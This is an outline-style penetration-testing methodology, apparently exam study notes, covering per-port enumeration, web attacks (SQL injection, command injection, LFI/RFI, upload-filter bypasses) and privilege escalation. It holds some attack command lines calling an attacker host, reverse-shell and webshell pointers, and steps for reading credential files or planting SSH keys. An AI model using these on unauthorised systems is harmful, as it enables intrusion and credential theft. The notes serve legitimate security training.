1. Network Enum
    1. 21/FTP
      1. Anonymous Login
        1. File Read
          1. Possible Any confidential Information
        2. File Write
          1. Possible Filewrite to access through Web
          2. FTP to file upload ==> Execute from web == webshell
      2. Password Checking if you found with other enum
        1. maybe brute-force
    2. 22/SSH
      1. Password Checking if you found with other enum
      2. No Brute-Force 99.99%
    3. 25/SMTP
      1. Username Enumration which can be chained to other vulnerability
    4. 80|443/HTTP/S
      1. Gobuster
        1. DIR
          1. For finding hidden directories and files
        2. DNS
          1. For finding Subdomains
      2. NIKTO
        1. Having quick information for the web stuff
    5. 139|445/SMB
      1. Null Session
        1. Read Permission
          1. Possible Confidential file to be available
        2. Write Permission
          1. Possible file uplaod to execute through web service
        3. Tools
          1. smbmap
          2. For checking What are the shares to available with permission information
          3. smbclient
          4. For connecting to SMB server for accessing those shares which are available to access
      2. Guest Session
        1. Read Permission
          1. Possible Confidential file to be available
        2. Write Permission
          1. Possible file uplaod to execute through web service
        3. Tools
          1. smbmap
          2. For checking What are the shares to available with permission information
          3. smbclient
          4. For connecting to SMB server for accessing those shares which are available to access
      3. Accessing Without Creds
      4. Accessing with any username
    6. 135/RPC
      1. USERname Enumaration
      2. Tool
        1. RPCCLIENT
    7. 2049/NFS
      1. Open NFS share
        1. Read Access
          1. Possible Confidential file to be available
        2. Write Access
          1. Possible file uplaod to execute through web service
        3. Tools
          1. mount
          2. For mounting Share available
          3. showmount
          4. For finding shares available
    8. 3306/MYSQL
      1. If not (Unauthorized)
        1. Try login without password
        2. can be used for checking passwords found via diffrent service
        3. Tools
          1. mysql (Client)
    9. 5985|5986/WINRM/S
      1. Remotly Windows Machine Access
        1. With Password
        2. With Hash
      2. Evil-Winrm(Tool)
    10. 3389/RDP
      1. try login with creds you have.
      2. use different clients like remmina if you see any errors with other client
      3. If logged in share folder to transfer files through remmina
    11. 161/SNMP
      1. Access Critical information about target system
      2. Tools
        1. snmp-check
        2. snmpwalk
    12. 53/DNS
      1. Can be used for getting information about subdomains
    13. rpcclient -U '%' -N <IP>
  2. Web-Enum
    1. Vulnerabilities Specific
      1. SQLinjection
        1. TO SHELL
          1. FILE Pemission
          2. By Reading Files
          3. SSH Private Keys
          4. To get information about users read /etc/passwd
          5. PayloadAllTheThings LFI list for finding other critical information
          6. Function
          7. LOAD_FILE('<FILE LOCATION>')
          8. By Writing Files
          9. Webshell Writing in Web-Hosting Directory
          10. For Windows use \\<Attacker IP>\sharename\anyfilename to get hash for the user
          11. Function
          12. into dumpfile '<FILE LOCATION>'
          13. into outfile '<FILE LOCATION>'
          14. Ascii mode
          15. Binary Mode
          16. Webshells which can be used
          17. Windows
          18. Oneliner
          19. P0wnyShell
          20. b374k
          21. Priority
          22. Linux
          23. Oneliner
          24. P0wnyShell
          25. b374k
          26. Priority
          27. To Find WebHosting Directory Use LFI list
          28. Responder tool
        2. To Get Information about Databases,Tables
          1. Find Username password & try same with other services like ssh,winrm,etc
      2. Command Injection
        1. Check
          1. Vulnerability Exist
          2. Windows
          3. Attacker
          4. tcpdump -i <tun0> -n ICMP
          5. Target
          6. Ping -c 1 <Attacker IP>
          7. Linux
          8. Attacker
          9. tcpdump -i <tun0> -n ICMP
          10. Target
          11. Ping -n 1 <Attacker IP>
          12. Port which can be used for Getting LAN shell
          13. Windows
          14. Attacker
          15. Python3 -m http.server <PORT to test>
          16. Target
          17. Powershell wget http://<AttackerIP:PORT/test>
          18. Linux
          19. Attacker
          20. Python3 -m http.server <PORT to test>
          21. Target
          22. wget http://<Attacker IP>:PORT/test
          23. curl http://<Attacker IP>:PORT/test
          24. Common Ports which works all the time
          25. Windows
          26. 21,22,25,80,443,445,53,123
          27. Priority 445
          28. Linux
          29. 21,22,25,80,443,445,53,123
          30. Priority 22
          31. If recived connection to the port use that for getting reverse shell
        2. Exploit
          1. Web-shell method
          2. Use wget command to write a web-shell to the web-hosting directory
          3. Using Curl command Writing Web-shell in web-hosting directory
          4. LAN-Shell Method
          5. After Checking if ping is working and port connection verified (IMP)
          6. Windows
          7. mkpsrevshell
          8. Powershell Nishang shell
          9. nc.exe upload
          10. Linux
          11. nc
          12. python
          13. ruby
          14. bash
          15. many
          16. Google Linux Reverse Shell CheetSheet
          17. SSH method
          18. only works if user is not daemon (service user like apache or www-data)
          19. Upload public key of attacker to /home/<USER>/.ssh/authorized_keys
          20. if folder is not exist create it ;)
      3. LFI
        1. TO SHELL
          1. log poisioning
          2. Try to access logs for the diffrent serivces running i.e ftp,smb,http
          3. If any of the log file is accesibble check if your input is reflacting
          4. to get log files location use LFI list
          5. Session Poisioning
          6. Try accessing session file
          7. To get session file location
          8. Payload All The things
          9. <?php echo session_save_path(); ?>
          10. On any linux Machines
          11. Add your session id (IMP)
          12. Read your cookie value and modify same with file name
        2. Reading Confidential File
          1. SSH Private Key
          2. For getting user location read /etc/passwd
          3. Config Files
          4. Use payloadallthethings LFI list
      4. RFI
        1. Start with
          1. Port which can be used for Getting LAN shell
          2. Windows
          3. Attacker
          4. Python3 -m http.server <PORT to test>
          5. Target
          6. change RFI param value to http://<Attacker_IP:PORT>/test
          7. Linux
          8. Attacker
          9. Python3 -m http.server <PORT to test>
          10. Target
          11. change RFI param value to http://<Attacker_IP:PORT>/test
          12. Common Ports which works all the time
          13. Windows
          14. 21,22,25,80,443,445,53,123
          15. Priority 445
          16. Linux
          17. 21,22,25,80,443,445,53,123
          18. Priority 22
        2. Once Port found to be used
          1. Windows
          2. Google windows php reverse shell and use that
          3. Oneliner
          4. best
          5. Linux
          6. google Linux php reverse shell and use that
          7. Oneliner
          8. best
          9. TIPS
          10. payload should be
          11. http://<Attacker_IP>:<PORT>/shell.php&cmd=whoami
          12. payload should not be
          13. http://<Attacker_IP>:<PORT>/shell.php?cmd=whoami
          14. ? And & makes a huge diffrence
      5. File Upload
        1. Uploading File
          1. php
          2. shells
          3. oneliner
          4. p0wny
          5. b374k
          6. msfvenom
          7. bypasses
          8. magic bytes bypass
          9. Modify first few bytes or signature with png signature
          10. file extension bypass AKA double extensions
          11. use double extension as below
          12. php.png
          13. php,jpeg
          14. php.gif
          15. Similar extensions
          16. php/php4/php5/phtml
          17. File Size check (client check only)
          18. If data sends file size param modify value to something which is higer
          19. use oneliner or smaller shells
          20. Content type Check
          21. Intercept request through burp
          22. Check for the content type header and modify as below
          23. image/png
          24. image/jpeg
          25. image/gif
          26. text/plain
          27. asp/aspx
          28. Shells
          29. Google ASPX shell and use those webshell and follow web-shell to lan shell method as shows earlier
          30. create ASP/X reverse shell with msfvenom
          31. Bypasses
          32. Content type Check
          33. Intercept request through burp
          34. Check for the content type header and modify as below
          35. image/png
          36. image/jpeg
          37. image/gif
          38. text/plain
          39. File Size check (client check only)
          40. If data sends file size param modify value to something which is higer
          41. use oneliner or smaller shells
          42. jsp
          43. Shells
          44. Google jsp shell and use those webshell and follow web-shell to lan shell method as shows earlier
          45. Bypasses
          46. Create JSP shell with msfvenom and use that
          47. For Apache Tomcat
          48. Windows IIS server
          49. WIndows IIS & Apacher httpd
        2. Accesing File
          1. gobuster
          2. Do a dictionary based attack to find all the hidden directory
          3. gobuster dir -w <wordlist> -u http://<IP>:PORT/ -t 100
          4. ffuf
          5. Do fuzzing with dictionary based attack
          6. ffuf -w <wordlist -u http://<IP:PORT>/FUZZ/filename_you_uploaded.php -t 100 -fc 200
          7. Best Directory wordlist
          8. seclist
          9. directory list 2-3 big.txt
          10. raft wordlist
          11. wordlist
          12. dirbuster directory list 2.3 big or medium
    2. CMS
      1. Finding
        1. Source Code
        2. Login page
        3. Comments
      2. Validating
        1. Dont use any exploit which is related to xss/xsrf and so on focus on vulnerability which i mentioned up
        2. Try finding github exploits as those are better sometimes
        3. Don't trust versions everytime
      3. Exploiting
        1. validate first
        2. use right port to get LAN shell
        3. follow earlier topic checks and validation
    3. Wordpress
      1. WPscan
        1. read manual
    4. Other
      1. Custom exploits takes place here you might have to find vulnerability on your own from the list above
      2. X-Forwarded-For to accesing 403 page
  3. Exploitation
    1. Modifications
      1. Automated Exploits
        1. Path Sometimes Changed
        2. using Alternative command (SHELLCODE)
        3. Making Dev-Exploits to final
        4. Solving errors
        5. Sometime Exploits Contains proxies configurations
      2. Instruction Based Exploits
        1. Find Automated one
        2. read and understand complete
        3. use logics as most of the time instruction based exploits requires to fully understand concepts
        4. Needs less modifications but it requires like. changing path or maybe finding path
    2. Finding Alternatives
      1. Search on google with CVE number and find blogs, exploits from github, papers etc.
      2. searchsploit will help for quick list all thoses
    3. Exploiting With right way
      1. try all exploits if no version information disclosed as sometimes its obfuscated
      2. Focus on critical vulnerabilities more
    4. BufferOverflow
      1. Practice more on Vanilla B0f AKA stack based b0f
  4. Privilege Escalation
    1. Windows
      1. Manual Approaches
        1. 1) Check low privilege Shell permission (whoami /priv) and try exploiting vuln X
        2. 2) Check Software Installation Directory And find suspecious programs that are installed
        3. 3) Check for Weak permissions in services and its binpath
        4. 4) Check for Unquoted Service Path Vulnerability
        5. 5) Check For Service Registry permissions
        6. 6) Check Scheduled Tasks
        7. Read Names carefully
      2. Automated (best for beginners)
        1. PowerUp
        2. WinPEAS
        3. Windows exploit suggester.
        4. Fails to Check Vulnerable Softwares
        5. its like using sword for sewing ......
        6. sometimes creator forgot to use latest OS and this can be a luck time for you and you might find something.
    2. Unix
      1. Manual Approaches
        1. Check For Sudoers Misconfigurations
        2. Check For SUID permissions
        3. Check Services Running on root
        4. Check Internal Ports
        5. Check ports blocked by firewall
        6. Check Kernal Version and exploits
        7. keep eyes on 127.0.0.1
        8. compare with nmap result you have
      2. Automated (best for beginners)
        1. LSE (best)
        2. linPEAS
        3. lin Enum
        4. Its allowed for enumeration but not for exploitation and in recent changes of linpeas it has implemented exploitation too which is not allowed. so simple find vuln and exploit that manually (not just by execution linpeas).
  5. linkedin.com/in/rikunj/
  6. Telegram: https://t.me/R0B077
  7. Changelogs. 1) added ref links on each topics 2) minor changes 3) added couple more vuln and enum